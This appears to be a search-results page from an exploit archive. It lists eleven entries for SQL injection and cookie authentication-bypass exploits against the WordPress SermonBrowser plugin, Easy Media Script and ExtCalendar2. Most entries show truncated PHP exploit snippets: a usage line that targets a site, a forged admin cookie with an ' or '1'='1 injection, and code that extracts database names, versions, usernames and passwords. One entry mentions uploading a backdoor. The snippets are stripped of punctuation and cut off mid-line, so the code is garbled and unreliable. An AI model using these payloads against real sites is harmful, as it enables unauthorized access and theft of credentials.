11 matches found
WordPress SermonBrowser Plugin 0.43 SQL Injection
No description provided by source. ?php if!$argv1 die Usage : php exploit.php site Example : php exploit.php http://site.com/wp/ ; printr Tilte......: WordPress SermonBrowser Plugin 0.43 SQL Injection Author.....: Ma3sTr0-Dz Date.......: 25-o4-2o11 Location ..: ALGERIA HoMe ......: wWw.sEc4EvEr.C...
Easy Media Script SQL Injection Vulnerability
No description provided by source. ?php if!$argv1 die Usage : php exploit.php site Example : php exploit.php http://site.tld/PATH/ ; printr Tilte......: Easy Media Script SQL Injection Author.....: Lagripe-Dz Date.......: 27-o5-2o11 Location ..: ALGERIA HoMe ......: Sec4Ever.com & Lagripe-Dz.org...
ExtCalendar2 SQL Injection / Authentcation Bypass
ext20username pregmatchall'extcalcookieid = "."', DzCURL$target,0,0 , $prf; $prefix = $prf10; header .. $header = "Cookie: ".$prefix."username=admin ' or '1'= '1; ".$prefix."password=admin ' or '1'= '1;"; check if it's work by looking for logout echo eregi"logout", DzCURL$target,0,$header ? " Log...
ExtCalendar2 - Cookie Authentication Bypass / Backdoor Upload
ext20username pregmatchall'extcalcookieid = "."', DzCURL$target,0,0 , $prf; $prefix = $prf10; header .. $header = "Cookie: ".$prefix."username=admin ' or '1'= '1; ".$prefix."password=admin ' or '1'= '1;"; check if it's work by looking for logout echo eregi"logout", DzCURL$target,0,$header ? " Log...
ExtCalendar2 (Auth Bypass/Cookie) SQL Injection Vulnerability
Exploit for php platform in category web applications ext20username pregmatchall'extcalcookieid = "."', DzCURL$target,0,0 , $prf; $prefix = $prf10; header .. $header = "Cookie: ".$prefix."username=admin ' or '1'= '1; ".$prefix."password=admin ' or '1'= '1;"; check if it's work by looking for logo...
ExtCalendar2 - Cookie Authentication Bypass Backdoor Upload
ExtCalendar2 - Cookie Authentication Bypass Backdoor Upload ext20username pregmatchall'extcalcookieid = "."', DzCURL$target,0,0 , $prf; $prefix = $prf10; header .. $header = "Cookie: ".$prefix."username=admin ' or '1'= '1; ".$prefix."password=admin ' or '1'= '1;"; check if it's work by looking fo...
Easy Media Script - SQL Injection
Easy Media Script - SQL Injection alert0 -== Start ==- "; $t=array"dbuser "="user","dbversion"="version","dbname "="database", "UserName "="user","Password "="pass"; foreach$t as $r=$y...
Easy Media Script - SQL Injection
alert0 -== Start ==- "; $t=array"dbuser "="user","dbversion"="version","dbname "="database", "UserName "="user","Password "="pass"; foreach$t as $r=$y...
Easy Media Script SQL Injection
alert0 -== Start ==- "; $t=array"dbuser "="user","dbversion"="version","dbname "="database", "UserName "="user","Password "="pass"; foreach$t as $r=$y...
Easy Media Script SQL Injection Vulnerability
Exploit for php platform in category web applications alert0 -== Start ==- "; $t=array"dbuser "="user","dbversion"="version","dbname "="database", "UserName "="user","Password "="pass"; foreach$t as $r=$y...
WordPress SermonBrowser Plugin 0.43 XSS / SQL Injection
alert0 FPD : http://site/wp/wp-content/plugins/sermon-browser/sermon.php -== Start ==- "; $t=array"dbusr"="user","dbver"="version","dbnam"="database","usrnm"="userlogin","passwd"="userpass"; function text2hex$string $hex = ''; $len = strlen$string ; for $i = 0; $i $y...